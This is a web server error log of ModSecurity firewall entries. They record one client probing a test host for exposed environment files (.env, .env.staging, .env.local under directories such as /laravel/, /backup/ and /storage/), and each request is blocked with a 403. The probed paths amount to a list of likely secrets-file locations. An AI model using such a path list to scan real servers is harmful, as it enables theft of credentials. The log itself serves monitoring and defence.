[Thu Jan 08 21:17:59.190232 2026] [:error] [pid 1270041] [client 18.119.100.98:56120] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/current/.env.staging"] [unique_id "aWAQ983GwEx_BV8-CrWUSQAAAAU"]
[Thu Jan 08 21:17:59.531151 2026] [:error] [pid 1270042] [client 18.119.100.98:56256] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "aWAQ9y7RlX2cRjHcFz6xxQAAAAY"]
[Thu Jan 08 21:17:59.531363 2026] [:error] [pid 1270042] [client 18.119.100.98:56256] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "aWAQ9y7RlX2cRjHcFz6xxQAAAAY"]
[Thu Jan 08 21:17:59.531514 2026] [:error] [pid 1270042] [client 18.119.100.98:56256] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env"] [unique_id "aWAQ9y7RlX2cRjHcFz6xxQAAAAY"]
[Thu Jan 08 21:17:59.877220 2026] [:error] [pid 1283304] [client 18.119.100.98:56380] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /front/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/FRONT/.env"] [unique_id "aWAQ92AwUIZgFNkik8yVQAAAAAg"]
[Thu Jan 08 21:17:59.877427 2026] [:error] [pid 1283304] [client 18.119.100.98:56380] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/FRONT/.env"] [unique_id "aWAQ92AwUIZgFNkik8yVQAAAAAg"]
[Thu Jan 08 21:17:59.877582 2026] [:error] [pid 1283304] [client 18.119.100.98:56380] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/FRONT/.env"] [unique_id "aWAQ92AwUIZgFNkik8yVQAAAAAg"]
[Thu Jan 08 21:18:00.225243 2026] [:error] [pid 1270036] [client 18.119.100.98:56496] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.local"] [unique_id "aWAQ-OM1154Q6b0hewij6QAAAAE"]
[Thu Jan 08 21:18:00.225461 2026] [:error] [pid 1270036] [client 18.119.100.98:56496] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.local"] [unique_id "aWAQ-OM1154Q6b0hewij6QAAAAE"]
[Thu Jan 08 21:18:00.225618 2026] [:error] [pid 1270036] [client 18.119.100.98:56496] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backup/.env.local"] [unique_id "aWAQ-OM1154Q6b0hewij6QAAAAE"]
[Thu Jan 08 21:18:00.573558 2026] [:error] [pid 1270037] [client 18.119.100.98:56614] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env"] [unique_id "aWAQ-OA_IfWyU2EIiRhOiQAAAAI"]
[Thu Jan 08 21:18:00.573763 2026] [:error] [pid 1270037] [client 18.119.100.98:56614] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env"] [unique_id "aWAQ-OA_IfWyU2EIiRhOiQAAAAI"]
[Thu Jan 08 21:18:00.573914 2026] [:error] [pid 1270037] [client 18.119.100.98:56614] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env"] [unique_id "aWAQ-OA_IfWyU2EIiRhOiQAAAAI"]
[Thu Jan 08 21:18:00.920623 2026] [:error] [pid 1280390] [client 18.119.100.98:56728] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aWAQ-NKTJIy7S9W5nL2LRAAAAAk"]
[Thu Jan 08 21:18:00.920831 2026] [:error] [pid 1280390] [client 18.119.100.98:56728] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aWAQ-NKTJIy7S9W5nL2LRAAAAAk"]
[Thu Jan 08 21:18:00.920985 2026] [:error] [pid 1280390] [client 18.119.100.98:56728] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aWAQ-NKTJIy7S9W5nL2LRAAAAAk"]
[Thu Jan 08 21:18:01.265756 2026] [:error] [pid 1270038] [client 18.119.100.98:56856] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aWAQ-RmwMJtANIcuNUXpKQAAAAM"]
[Thu Jan 08 21:18:01.265973 2026] [:error] [pid 1270038] [client 18.119.100.98:56856] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aWAQ-RmwMJtANIcuNUXpKQAAAAM"]
[Thu Jan 08 21:18:01.266131 2026] [:error] [pid 1270038] [client 18.119.100.98:56856] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aWAQ-RmwMJtANIcuNUXpKQAAAAM"]
[Thu Jan 08 21:18:01.615689 2026] [:error] [pid 1270039] [client 18.119.100.98:56986] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aWAQ-ZccQYhM1DUhi_W7DgAAAAQ"]
[Thu Jan 08 21:18:01.615915 2026] [:error] [pid 1270039] [client 18.119.100.98:56986] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aWAQ-ZccQYhM1DUhi_W7DgAAAAQ"]
[Thu Jan 08 21:18:01.616075 2026] [:error] [pid 1270039] [client 18.119.100.98:56986] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aWAQ-ZccQYhM1DUhi_W7DgAAAAQ"]
[Thu Jan 08 21:18:01.963492 2026] [:error] [pid 1270043] [client 18.119.100.98:57122] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /marketing/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.staging"] [unique_id "aWAQ-QvEr1EpOYnVfM6ryQAAAAc"]
[Thu Jan 08 21:18:01.963701 2026] [:error] [pid 1270043] [client 18.119.100.98:57122] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.staging"] [unique_id "aWAQ-QvEr1EpOYnVfM6ryQAAAAc"]
[Thu Jan 08 21:18:01.963900 2026] [:error] [pid 1270043] [client 18.119.100.98:57122] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/marketing/.env.staging"] [unique_id "aWAQ-QvEr1EpOYnVfM6ryQAAAAc"]
[Thu Jan 08 21:18:02.309835 2026] [:error] [pid 1270035] [client 18.119.100.98:57232] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWAQ-iYqm_i2BUcmtQb4vgAAAAA"]
[Thu Jan 08 21:18:02.310072 2026] [:error] [pid 1270035] [client 18.119.100.98:57232] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWAQ-iYqm_i2BUcmtQb4vgAAAAA"]
[Thu Jan 08 21:18:02.310239 2026] [:error] [pid 1270035] [client 18.119.100.98:57232] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWAQ-iYqm_i2BUcmtQb4vgAAAAA"]
[Thu Jan 08 21:18:02.652108 2026] [:error] [pid 1270041] [client 18.119.100.98:57348] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.staging"] [unique_id "aWAQ-s3GwEx_BV8-CrWUSgAAAAU"]
[Thu Jan 08 21:18:02.652418 2026] [:error] [pid 1270041] [client 18.119.100.98:57348] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.staging"] [unique_id "aWAQ-s3GwEx_BV8-CrWUSgAAAAU"]
[Thu Jan 08 21:18:02.652638 2026] [:error] [pid 1270041] [client 18.119.100.98:57348] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env.staging"] [unique_id "aWAQ-s3GwEx_BV8-CrWUSgAAAAU"]
[Thu Jan 08 21:18:02.998963 2026] [:error] [pid 1270042] [client 18.119.100.98:57460] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.staging"] [unique_id "aWAQ-i7RlX2cRjHcFz6xxgAAAAY"]
[Thu Jan 08 21:18:02.999191 2026] [:error] [pid 1270042] [client 18.119.100.98:57460] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.staging"] [unique_id "aWAQ-i7RlX2cRjHcFz6xxgAAAAY"]
[Thu Jan 08 21:18:02.999349 2026] [:error] [pid 1270042] [client 18.119.100.98:57460] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env.staging"] [unique_id "aWAQ-i7RlX2cRjHcFz6xxgAAAAY"]
[Thu Jan 08 21:18:03.342560 2026] [:error] [pid 1283304] [client 18.119.100.98:57590] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.local"] [unique_id "aWAQ-2AwUIZgFNkik8yVQQAAAAg"]
[Thu Jan 08 21:18:03.342777 2026] [:error] [pid 1283304] [client 18.119.100.98:57590] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.local"] [unique_id "aWAQ-2AwUIZgFNkik8yVQQAAAAg"]
[Thu Jan 08 21:18:03.342960 2026] [:error] [pid 1283304] [client 18.119.100.98:57590] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.local"] [unique_id "aWAQ-2AwUIZgFNkik8yVQQAAAAg"]
[Thu Jan 08 21:18:03.682909 2026] [:error] [pid 1270036] [client 18.119.100.98:57710] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.staging"] [unique_id "aWAQ--M1154Q6b0hewij6gAAAAE"]
[Thu Jan 08 21:18:03.683110 2026] [:error] [pid 1270036] [client 18.119.100.98:57710] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.staging"] [unique_id "aWAQ--M1154Q6b0hewij6gAAAAE"]
[Thu Jan 08 21:18:03.683274 2026] [:error] [pid 1270036] [client 18.119.100.98:57710] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/old/.env.staging"] [unique_id "aWAQ--M1154Q6b0hewij6gAAAAE"]
